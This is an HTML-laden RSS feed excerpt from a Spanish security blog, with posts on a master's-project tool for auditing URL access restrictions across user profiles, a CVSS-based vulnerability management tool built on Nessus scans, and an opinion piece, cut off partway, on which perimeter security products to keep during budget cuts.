&lt;a href="http://1.bp.blogspot.com/-q4fHpFb58yE/T7uAYWJlv8I/AAAAAAAAHDM/EEjcF8-D0pk/s1600/logo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-q4fHpFb58yE/T7uAYWJlv8I/AAAAAAAAHDM/EEjcF8-D0pk/s200/logo.png" width="178" /&gt;&lt;/a&gt;&lt;/div&gt;
Como proyecto de &lt;a href="http://www.uem.es/postgrado/master-oficial-en-seguridad-de-las-tecnologias-de-la-informacion-y-las-comunicaciones"&gt;final de master de seguridad&lt;/a&gt;&lt;b&gt;, se planteó analizar una de las vulnerabilidades&lt;/b&gt; &lt;b&gt;top 10 de
OWASP&lt;/b&gt;, en concreto la vulnerabilidad es conocida como, &lt;b&gt;Falla de Restricción de Acceso a URL&lt;/b&gt;.
Cómo resultado de este análisis se ha desarrollado una herramienta con el objetivo servir de
ayuda en auditorias de caja blanca para detectar esta vulnerabilidad.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Debido a la dificultad de poder detectar de manera automática cuando esta previsto restringir
el acceso y cómo saber si este ha sido restringido correctamente, unas veces se verá un
mensaje de error, otras un mensajito más amigable dentro del interfaz de la propia aplicación
web y otras veces, las que menos, una pantalla en blanco. Se ha optado por otra solución a
nuestro entender más lógica. &lt;b&gt;La herramienta muestra para cada url los datos estadísticos
más básicos al emplear cada perfil: número de letras, con y sin blancos, y número de líneas. &lt;/b&gt;Y
permite para cada url acceder a una ventana comparativa en la que contrastar las diferencias a
mayor profundidad entre parejas de perfiles.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-FOvqkIH7Tog/T7uA1ThIOVI/AAAAAAAAHDU/Yzn1rS_UTqU/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="247" src="http://4.bp.blogspot.com/-FOvqkIH7Tog/T7uA1ThIOVI/AAAAAAAAHDU/Yzn1rS_UTqU/s400/1.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;b&gt;La herramienta, &lt;a href="http://failuretorestrictaccess.wordpress.com/"&gt;DoRodri&lt;/a&gt;, ha sido desarrollada en .Net&lt;/b&gt; y se encuentra bastante estable aunque
seguramente sujeta a algunos bugs.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Para su funcionamiento es preciso obtener previamente:&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Un fichero con las urls &lt;/b&gt;a analizar: se puede obtener de programas como el OWASP ZAP con la opción “exportar todas las urls a aun fichero”.&amp;nbsp;&lt;/li&gt;
&lt;li&gt;&lt;b&gt;Un listado de cookies&lt;/b&gt; de identificadores de sesión validos para los distintos perfiles a
analizar.


Una vez obtenido lo anterior es hora de pasárselo al programa para que analice la web.&amp;nbsp;&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-KB2DaQ9HMcs/T7uA8vsa3HI/AAAAAAAAHDc/oWTZbsmi1pI/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="221" src="http://2.bp.blogspot.com/-KB2DaQ9HMcs/T7uA8vsa3HI/AAAAAAAAHDc/oWTZbsmi1pI/s400/2.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style="text-align: justify;"&gt;El programa de manera automática, tras cargar el fichero de urls, genera un árbol con la
estructura de la web a analizar, obtiene las capturas de pantalla de cada perfil y muestra la
opción de descargar los códigos fuente para estimar diferencias a nivel de código html.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-K3lqW3JVZO4/T7uA-wN7S4I/AAAAAAAAHDk/TcZdf4xrdgQ/s1600/3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="242" src="http://1.bp.blogspot.com/-K3lqW3JVZO4/T7uA-wN7S4I/AAAAAAAAHDk/TcZdf4xrdgQ/s400/3.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Una vez obtenida la información por parte del programa empieza el trabajo humano, hay
que comparar para cada url, o las que el analista estime oportuno, si el control se realiza de manera correcta.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Al pulsar sobre cada miniatura se muestra una ventana comparativa en la que muestra la
respuesta visual que arroja la aplicación web para cada perfil. Adicionalmente en la parte
inferior se aprecian las estadísticas sobre el número de líneas y caracteres, y en la superior

se realiza una comparación a nivel de código indicando el grado de diferencia que hay entre
los dos códigos html mediante el cálculo del factor de distancia de Damerau–Levenshtein.
Entendiendose como tal al número mínimo de operaciones requeridas para transformar una
cadena de caracteres en otra. Se entiende por operación, bien una inserción, eliminación,
sustitución o transposición de dos caracteres.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-0AB1z-QOwBU/T7uBAnxrFmI/AAAAAAAAHDs/kNS3203MzBQ/s1600/4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="176" src="http://4.bp.blogspot.com/-0AB1z-QOwBU/T7uBAnxrFmI/AAAAAAAAHDs/kNS3203MzBQ/s400/4.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div&gt;
&lt;a href="http://failuretorestrictaccess.wordpress.com/"&gt;&lt;/a&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;
Esta información estadística permite para perfiles con privilegios cercanos, en los cuales la
interfaz es muy similar, obtener datos bajando al nivel de código, sobre el grado de similitud real que hay entre ambos.

Para obtener la herramienta y más información se puede acceder a la página del proyecto:&amp;nbsp;
&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Dirección de la herramienta:&amp;nbsp;&lt;a href="http://failuretorestrictaccess.wordpress.com/"&gt;http://failuretorestrictaccess.wordpress.com/&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Todo comentario, sugerencia o crítica será bienvenida.&amp;nbsp;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
¡Gracias!&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Autores:&lt;br /&gt;
Fernando Andina.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
José Miguel Soriano.&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-3280836435155022281?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/7R4VbNYntbU" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/7R4VbNYntbU/dorodri-falla-de-restriccion-de-acceso.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-q4fHpFb58yE/T7uAYWJlv8I/AAAAAAAAHDM/EEjcF8-D0pk/s72-c/logo.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/dorodri-falla-de-restriccion-de-acceso.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-2875970152382734112</guid><pubDate>Tue, 22 May 2012 06:08:00 +0000</pubDate><atom:updated>2012-05-22T08:08:21.132+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">analisis de vulnerabilidades</category><category domain="http://www.blogger.com/atom/ns#">master</category><category domain="http://www.blogger.com/atom/ns#">nessus</category><category domain="http://www.blogger.com/atom/ns#">pfm</category><title>Centro de Servicio de Vulnerabilidades - VulnerabilityChaser</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-GRXL4PnQuX0/T7p81x1tsyI/AAAAAAAAAEM/YdkDS86t6aU/s1600/vulnchaser.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="118" src="http://3.bp.blogspot.com/-GRXL4PnQuX0/T7p81x1tsyI/AAAAAAAAAEM/YdkDS86t6aU/s320/vulnchaser.png" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Somos Ibrahim Peraza y María Ángeles Caballero,&amp;nbsp; dos alumnos del &lt;a href="http://www.uem.es/postgrado/master-oficial-en-seguridad-de-las-tecnologias-de-la-informacion-y-las-comunicaciones" target="_blank"&gt;Máster Universitario de las Tecnologías de la Información y la Comunicación de la UEM&lt;/a&gt; trabajando en el &lt;b&gt;Proyecto de Fin de Máster &lt;/b&gt;“Centro de Servicio de Vulnerabilidades - &lt;b&gt;VulnerabilityChaser&lt;/b&gt;”. Los profesores del Máster ofertan proyectos relacionados con el mundo de la seguridad y éstos, se desarrollan por varios alumnos. Los proyectos requieren un trabajo previo de investigación, abordando un análisis en profundidad de la problemática concreta y un desarrollo posterior, siempre tutelado por el director del proyecto, en nuestro caso Alejandro Ramos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
En concreto, nuestro proyecto va enfocado a la &lt;b&gt;gestión de vulnerabilidades &lt;/b&gt;de los &lt;b&gt;activos de una compañía&lt;/b&gt;. Al realizar un estudio previo pudimos observar varias &lt;b&gt;deficiencias &lt;/b&gt;en la información que &lt;b&gt;proporcionan &lt;/b&gt;los escáneres de vulnerabilidades como pueden ser &lt;b&gt;Nessus &lt;/b&gt;o GFI LANguard. Son herramientas muy potentes en cuanto al análisis de vulnerabilidades, pero &lt;b&gt;la información que se muestra acerca de la severidad de las vulnerabilidades no es del todo realista&lt;/b&gt;, ya que la puntuación se basa en valores estándar como el CVSS Base sin tener en cuenta factores concretos del sistema afectado como puede ser si es un equipo en producción o simplemente se utiliza para pruebas de desarrollo. Otra &lt;b&gt;deficiencia observada&lt;/b&gt;, es que no es posible ver la &lt;b&gt;evolución del estado de las vulnerabilidades a lo largo del tiempo &lt;/b&gt;(abierta, cerrada, asumida o planificada), ya que los escáneres de vulnerabilidades nos entregan un informe sobre el estado de nuestros activos en un instante de tiempo concreto, no guardan los datos para ser comparados frente a futuros escaneos.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
Nessus usa el CVSS base score para clasificar la severidad de una vulnerabilidad pudiendo ser &lt;i&gt;info, medium, high o critical&lt;/i&gt;. El CVSS base score no es suficiente para determinar la severidad de una vulnerabilidad ya que entran en juego otros factores, como por ejemplo, la existencia o no de un &lt;i&gt;exploit &lt;/i&gt;para dicha vulnerabilidad, el tipo de información que almacena el sistema, tipo de entorno (integración, preproducción o producción) , etc.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
Lo ideal sería calcular para cada vulnerabilidad el CVSS final. El CVSS se calcula en función de 3 vectores: &lt;i&gt;base, temporal y environmental&lt;/i&gt;:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
-&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;Base&lt;/b&gt;: representa las características intrínsecas y fundamentales de una vulnerabilidad que son constantes en el tiempo y en los entornos de usuario.&lt;br /&gt;
Las métricas de éste vector comprenden:&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Access Vector (AV): &lt;/b&gt;refleja como la vulnerabilidad es explotada.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Local (L); Adjacent Network (A); Network Access (N).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Access Complexity (AC): &lt;/b&gt;mide la complejidad del ataque para explotar la vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;High (H); Medium (M); Low (L).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Authentication (Au): &lt;/b&gt;mide el número de veces que un atacante debe de autenticarse para explotar la vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Multiple (M); Single (S); None (N).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Confidentiality Impact (C): &lt;/b&gt;este indicador mide el impacto sobre la confidencialidad de una vulnerabilidad al explotarla.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Partial (P); Complete (C).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Integrity Impact (I)&lt;/b&gt;: este indicador mide el impacto a la integridad de una vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Partial (P); Complete (C).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Availability Impact (A):&lt;/b&gt; este indicador mide el impacto a la disponibilidad de una vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Partial (P); Complete (C).&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
-&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;Temporal&lt;/b&gt;: representa las características de una vulnerabilidad que cambian con el tiempo pero no entre los entornos de usuario.&lt;br /&gt;
Las métricas de éste vector comprenden:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Exploitability (E): &lt;/b&gt;esta métrica mide el estado actual de las técnicas de exploit o disponibilidad de código.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Unproven (U); Proof-of-Concept (POC); Functional (F); High (H); Not Defined (ND).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Remediation Level (RL): &lt;/b&gt;mide el nivel de corrección de la vulnerabilidad, si existe parche, soluciones provisionales, etc.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Official Fix (OF); Temporary Fix (TF); Workaround (W); Unavailable (U); Not Defined (ND).&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Report Confidence (RC): &lt;/b&gt;esta métrica mide el grado de existencia de confianza en la vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;Unconfirmed (UC); Uncorroborated (UR); Confirmed (C); Not Defined (ND)&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
-&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;b&gt;Environmental&lt;/b&gt;: representa las características de una vulnerabilidad que son relevantes y únicas para el entorno de cada usuario concreto.&lt;br /&gt;
Las métricas de éste vector comprenden:&lt;/div&gt;
&lt;ul&gt;
&lt;li&gt;&lt;b&gt;Collateral Damage Potential (CDP)&lt;/b&gt;: éste indicador mida la potencia de pérdida de vidas o bienes físicos a través del daño de equipos o robo de éstos.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Low (L); Low-Medium (LM); Medium-High (MH); High (H); Not Defined (ND)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Target Distribution (TD): &lt;/b&gt;éste indicador mide la proporción de los sistemas vulnerables, número de sistemas que podrían verse afectados por la vulnerabilidad.&lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Low (L); Medium (LM); High (H); Not Defined (ND)&lt;/li&gt;
&lt;/ul&gt;
&lt;li&gt;&lt;b&gt;Security Requirements (CR, IR, AR): &lt;/b&gt;éstas medidas permiten personalizar la puntuación del CVSS dependiendo de la importancia de los activos afectados medido en términos de Confidencilidad, Integradidad y Disponibilidad.&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/li&gt;
&lt;ul&gt;
&lt;li&gt;None (N); Low (L); Medium (LM); High (H); Not Defined (ND)&lt;/li&gt;
&lt;/ul&gt;
&lt;/ul&gt;
&lt;div style="text-align: justify;"&gt;
Finalmente, cada métrica tendrá un valor asociado, lo que formará los 3 vectores:&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;br /&gt;
Base&amp;nbsp;&amp;nbsp;&amp;nbsp; AV:[L,A,N]/AC:[H,M,L]/Au:[M,S,N]/C:[N,P,C]/I:[N,P,C]/A:[N,P,C]&lt;br /&gt;
Temporal&amp;nbsp;&amp;nbsp;&amp;nbsp; E:[U,POC,F,H,ND]/RL:[OF,TF,W,U,ND]/RC:[UC,UR,C,ND]&lt;br /&gt;
Environmental&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; CDP:[N,L,LM,MH,H,ND]/TD:[N,L,M,H,ND]/CR:[L,M,H,ND]/ IR:[L,M,H,ND]/AR:[L,M,H,ND]&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-7dp6Ox97lN0/T7p7HKRwCAI/AAAAAAAAAD0/O99eVPKFZII/s1600/cvss-metric-equations.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="147" src="http://2.bp.blogspot.com/-7dp6Ox97lN0/T7p7HKRwCAI/AAAAAAAAAD0/O99eVPKFZII/s400/cvss-metric-equations.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Podemos consultar en &lt;span lang="EN-GB"&gt;&lt;a href="http://www.first.org/cvss/cvss-guide"&gt;&lt;span lang="ES"&gt;FIRST&lt;/span&gt;&lt;/a&gt;&lt;/span&gt; el cálculo del
score de cada uno de los vectores y el CVSS final.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
VulnerabilityChaser, la herramienta que hemos desarrollado, gestiona el
ciclo completo de vida de la vulnerabilidad. La aplicación permite la
introducción del resultado de un microanálisis de riesgos por cada activo del
sistema utilizándolo (el resultado) para calcular el valor del CVSS. Los
valores &lt;i style="mso-bidi-font-style: normal;"&gt;base&lt;/i&gt; y &lt;i style="mso-bidi-font-style: normal;"&gt;temporal &lt;/i&gt;vienen dados en el escaneo de Nessus y el &lt;i style="mso-bidi-font-style: normal;"&gt;environmental&lt;/i&gt; es el resultado del
microanálisis de modo que con estos tres parámetros se realiza el nuevo cálculo
de la criticidad de la vulnerabilidad quedando ésta adaptada de forma real al
entorno en que se encuentra.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-U1iCwc1aoyw/T7p7Zu0EffI/AAAAAAAAAD8/rfgIpNEcW-Y/s1600/art1_vulnerabilities.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="252" src="http://2.bp.blogspot.com/-U1iCwc1aoyw/T7p7Zu0EffI/AAAAAAAAAD8/rfgIpNEcW-Y/s400/art1_vulnerabilities.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
VulnerabilityChaser, hace las funciones de centro de servicio de
vulnerabilidades para una empresa, facilitando la vida al administrador de
seguridad. Esta herramienta es gratuita y &lt;i style="mso-bidi-font-style: normal;"&gt;opensource&lt;/i&gt;
pudiendo ser descargada de &lt;span lang="EN-GB"&gt;&lt;a href="http://ibrapk.github.com/VulnerabilityChaser"&gt;&lt;span lang="ES"&gt;GitHub&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;. A día de hoy la aplicación aún se encuentra en un estado alfa de
desarrollo.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;span class="MsoHyperlink"&gt;&lt;span style="font-family: Georgia, serif;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
La aplicación recoge la información de las vulnerabilidades de los escaneos
de Nessus y la muestra de manera ordenada; permite cambiar el estatus de una
vulnerabilidad, por ejemplo, de abierta a planificarla en una fecha para
solucionarla más adelante si se quisiera, gestionar toda la parte de activos
previamente comentada, mostrar estadísticas de manera gráfica y otras muchas
funcionalidades.&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="MsoNormal" style="text-align: justify;"&gt;
Artículo escrito por Ibrahim Peraza y María Ángeles Caballero.&lt;br /&gt;
Twitter: @&lt;a href="https://twitter.com/#%21/vul_chaser/" target="_blank"&gt;vul_chaser&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5399811056563385935-2875970152382734112?l=www.securitybydefault.com' alt='' /&gt;&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/LjrJHOiYnIM" height="1" width="1"/&gt;</description><link>http://feedproxy.google.com/~r/SecurityByDefault/~3/LjrJHOiYnIM/centro-de-servicio-de-vulnerabilidades.html</link><author>noreply@blogger.com (Contribuciones)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-GRXL4PnQuX0/T7p81x1tsyI/AAAAAAAAAEM/YdkDS86t6aU/s72-c/vulnchaser.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.securitybydefault.com/2012/05/centro-de-servicio-de-vulnerabilidades.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-5399811056563385935.post-6417448612675055689</guid><pubDate>Mon, 21 May 2012 04:32:00 +0000</pubDate><atom:updated>2012-05-21T06:32:00.250+02:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">2012</category><category domain="http://www.blogger.com/atom/ns#">seguridad perimetral</category><category domain="http://www.blogger.com/atom/ns#">recortes</category><title>Llegan los recortes, también a la seguridad</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-e_ZWNC7kX6o/T7jWIYJ1weI/AAAAAAAAA0w/DDJ1OHTPsE8/s1600/stop-recortes.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-e_ZWNC7kX6o/T7jWIYJ1weI/AAAAAAAAA0w/DDJ1OHTPsE8/s320/stop-recortes.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Lamentablemente, nos estamos acostumbrando a que, todos los viernes, tengamos una sorpresa nueva de recortes por parte del gobierno de España. La crisis se ha extendido, con la velocidad de la peste, a todos los sectores. Empresas en las que la seguridad era algo en lo que NO se podía recortar, porque "&lt;i&gt;imagínate si no invertimos en seguridad, nos la pueden liar&lt;/i&gt;",… han pasado a tener el presupuesto justo para pagar los mantenimientos de los medios de seguridad más importantes y nada más. He llegado a ver casos extremos en que ni siquiera los discos de una SAN, donde se almacenaba la información más valiosa de la organización, estaban bajo mantenimiento...&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En épocas de bonanza en las que las empresas destinaban cantidades ingentes de dinero en adaptarse a la mitigación de las últimas amenazas, se veían grandes infraestructuras formadas por una legión de máquinas especializadas en protección perimetral.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Bueno, y si ahora hubiese que recortar: &lt;b&gt;¿con qué nos deberíamos quedar?&lt;/b&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;La verdad es que es difícil para un responsable de seguridad, acostumbrado a "un estado de bienestar" con infraestructuras que le ayudan a su trabajo diario, tener que sacrificar a uno o varios de sus "hijos" para poder seguir adelante. Como cada día, en la vida, las decisiones se toman evaluando los riesgos y priorizando lo que realmente es imprescindible, ante lo que es necesario y lo deseable.&amp;nbsp; &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Después de leer artículos en los que se llega a &lt;a href="http://isc.sans.edu/diary.html?storyid=13240,%20https://www.infoworld.com/d/security/why-you-dont-need-firewall-193153"&gt;dudar de la importancia/necesidad&lt;/a&gt;&lt;a href="http://isc.sans.edu/diary.html?storyid=13240,%20https://www.infoworld.com/d/security/why-you-dont-need-firewall-193153"&gt; de elementos de seguridad como los propios cortafuegos&lt;/a&gt;, he querido elaborar mi propia lista de recortes explicando el por qué. &lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;b&gt;Recortemoshh pueshhh…&lt;/b&gt;&lt;/div&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;Los &lt;b&gt;cortafuegos&lt;/b&gt;, en mi opinión, &lt;b&gt;serían "la Sanidad"&lt;/b&gt;, y NO deberían "recortarse"/"eliminarse" en ninguno de los casos. En los artículos que menciono anteriormente, los autores se refieren a los firewalls como aquellos elementos que simplemente filtran tráfico en base a origen/destino/puerto… Creo que se plantean la "imprescibilidad" de los firewalls porque tienen en mente la funcionalidad que tenían estos dispositivos de los años 90. En este siglo los firewalls, además de dotar de mecanismos de mitigación de ataques propios de red (&lt;a href="https://en.wikipedia.org/wiki/SYN_flood"&gt;SYN-Flood&lt;/a&gt;, &lt;a href="http://es.kioskea.net/contents/attaques/attaque-land.php3"&gt;Land&lt;/a&gt;, &lt;a href="https://es.wikipedia.org/wiki/Ataque_smurf"&gt;Smurf&lt;/a&gt;, etc,…) comenzaron a incluir en la misma caja montones de funcionalidades: VPN, Antimalware, Antispam, IPS, gestión de ancho de banda, gestión de contenidos y proxy saliente (análisis de tráfico web), etc… es decir, que los UTM (Unified Thread Management) no pueden ser eliminados de las infraestructuras. Una opción de recorte, para evitar pagar altos precios en mantenimiento de estas soluciones, sería buscar una opción libre. Sin embargo, en una sola caja, aún no doy con un pack de funcionalidades UTM con una GUI elaborada, que me convenza totalmente contra soluciones comerciales (aunque típicamente caras) como Checkpoint, Fortinet, Juniper, Stonesoft o NetASQ. &lt;/li&gt;
&lt;/ul&gt;&lt;ul style="text-align: justify;"&gt;&lt;li&gt;&lt;b&gt;Antimalware&lt;/b&gt;: Aunque hay opciones libres como ClamAV o Avast!, en general las políticas de compras de las grandes y medianas corporaciones, prefieren que estas soluciones sean "de marca". En mi caso, llamadme tradicional si lo preferís, pero yo también lo prefiero. No voy a mostrarme más a favor de unos que de otros: pero mis top serían los que llevan años funcionando durante años: McAfee, Trendmicro, Kaspersky, Symantec, NOD32 o el producto nacional Panda. En general, las &lt;a href="http://www.securitybydefault.com/2012/03/taller-ack-buenas-practicas-de.html"&gt;buenas prácticas de seguridad&lt;/a&gt;, recomiendan que los antimalware que se incluyen en el gateway y en los puestos de trabajo, sean de diferente fabricante/marca/tecnología. Si tuviésemos que recortar en algo, evidentemente no se puede prescindir de solución antimalware, pero sí que se puede aunar en un mismo fabricante (siendo consciente que el nivel de seguridad puede disminuir) a fin de conseguir una mejor oferta. &lt;/li&gt;
